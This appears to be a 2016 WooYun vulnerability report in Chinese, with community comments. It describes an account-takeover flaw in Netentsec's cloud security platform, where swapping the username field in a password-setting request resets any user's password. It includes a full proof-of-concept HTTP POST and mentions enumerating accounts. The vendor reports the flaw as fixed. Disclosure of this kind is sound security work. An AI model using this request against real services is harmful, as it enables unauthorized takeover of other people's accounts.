网康科技慧眼云安全平台秒改任意用户密码(官网帐号/新浪/360躺枪)

1.先注册一个帐号，收到继续注册的邮件，

2.打开邮箱中的url设置密码

3.提交时把用户名username改为他人帐号，修改成功

POST /main/index/setpass HTTP/1.1
 Host: yun.netentsec.com
 Proxy-Connection: keep-alive
 Content-Length: 113
 Accept: application/json, text/javascript, */*; q=0.01
 Origin: http://yun.netentsec.com
 X-Requested-With: XMLHttpRequest
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://yun.netentsec.com/main/index/activation?from=ACTIVE_BY_URL&action=activation&t=3dce3f511744e6dbc649912325b7a118
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
 Cookie: 
 
 username=360&email=aklf***%40163.com&pw=A******&newpw=A******&V1Nq0Lqkxqqgh6F=b05145d619fa53d0112583876eb93d76

通过注册时判断 用户是否存在来看一下wooyun都有哪些厂商在用

官网帐号：netentsec 、360 、sina

这个图好漂亮 。

校验啊校验 。

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-01 22:19

厂商回复：

感谢作者提交，我们会尽快修复！

最新状态：

2016-04-01：已修复；再次感谢作者！

1. 2016-04-01 17:29 | 沦沦 ( 普通白帽子 | Rank:651 漏洞数:149 | 爱老婆，爱生活|脚步不能停要一直向前走【...)

   1

   66666

   1# 回复此人

2. 2016-04-01 17:35 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

   1

   最大的痛苦是找不到一款适合自己的安全产品，能对整个业务系统进行安全监控的平台，求推荐！求推荐！求推荐！

   2# 回复此人

3. 2016-04-01 17:46 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

   1

   师傅V5678

   3# 回复此人

4. 2016-04-01 18:09 | only ( 路人 | Rank:4 漏洞数:1 | ★举世皆醒我独醉，世情淡泊我如胶)

   1

   6

   4# 回复此人

5. 2016-04-01 18:11 | PgHook ( 普通白帽子 | Rank:1020 漏洞数:123 | Portulaca grandiflora Hook.)

   1

   师傅厉害

   5# 回复此人

6. 2016-04-01 18:15 | 小川 ( 核心白帽子 | Rank:1627 漏洞数:241 | 一个致力要将乌云变成搞笑论坛的男人)

   1

   @专业种田 tangscan

   6# 回复此人

7. 2016-04-01 18:19 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

   1

   @小川 我要的能做业务日志分析发业务安全问题，估计只能定制了

   7# 回复此人

8. 2016-04-01 18:35 | 佳佳佳佳佳 ( 实习白帽子 | Rank:45 漏洞数:7 | I want to be ur sunshine.)

   1

   @专业种田 唐朝正在改进ing 这个功能已加入日程～

   8# 回复此人

9. 2016-04-02 06:53 | 共产党员 ( 路人 | Rank:26 漏洞数:7 | 为共产主义事业奋斗终身。)

   1

   666666

   9# 回复此人

10. 2016-04-02 12:55 | 大志哥 ( 路人 | Rank:22 漏洞数:7 | @_@)

    1

    这么牛怎么去种田了呢？

    10# 回复此人

11. 2016-04-02 15:34 | blnxz ( 实习白帽子 | Rank:55 漏洞数:16 | 为了防止世界被破坏，为了维护世界的和平，...)

    1

    BurpSuite下面那个图，中国台湾省~~

    11# 回复此人

12. 2016-04-02 16:21 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

    1

    666

    12# 回复此人

13. 2016-04-02 23:13 | 爹 ( 路人 | Rank:21 漏洞数:5 | 孤独及其所创造的)

    1

    @专业种田 大神你用的谷歌?还能抓https?求科普下

    13# 回复此人

14. 2016-04-02 23:20 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

    1

    @爹 burp中的certificate 设置成use a self-signed certificate 大部分网站可以。

    14# 回复此人

15. 2016-04-03 02:39 | 爹 ( 路人 | Rank:21 漏洞数:5 | 孤独及其所创造的)

    1

    @专业种田 非常感谢!

    15# 回复此人

16. 2016-04-03 14:58 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于，我也是有ID的人了！)

    1

    @专业种田 有个叫arcsight的产品是做日志收集和日志分析的，不知道你了解过没？可以看看,是惠普的产品。

    16# 回复此人

17. 2016-04-03 16:51 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

    1

    @bit4 多谢，我了解下

    17# 回复此人

18. 2016-04-03 21:43 | 爹 ( 路人 | Rank:21 漏洞数:5 | 孤独及其所创造的)

    1

    @专业种田 没找到cer 是在哪个选项卡里的阿 嘻嘻嘻

    18# 回复此人

19. 2016-04-03 22:01 | 沦沦 ( 普通白帽子 | Rank:651 漏洞数:149 | 爱老婆，爱生活|脚步不能停要一直向前走【...)

    1

    Proxy--->Options

    19# 回复此人

20. 2016-04-05 02:28 | 爹 ( 路人 | Rank:21 漏洞数:5 | 孤独及其所创造的)

    1

    @沦沦 找不到简直痛苦...能详细点吗 哈哈哈哈 有点近视

    20# 回复此人

21. 2016-04-06 11:45 | feng ( 普通白帽子 | Rank:764 漏洞数:91 | 想刷个6D)

    1

    种田哥哪来的这么多淫荡思路

    21# 回复此人

22. 2016-04-06 12:01 | 专业种田 ( 核心白帽子 | Rank:1686 漏洞数:214 | 没有最专业的农民,只有更努力地耕耘..........)

    1

    @feng 人长得帅没办法

    22# 回复此人

23. 2016-05-15 17:05 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)

    0

    66666

    23# 回复此人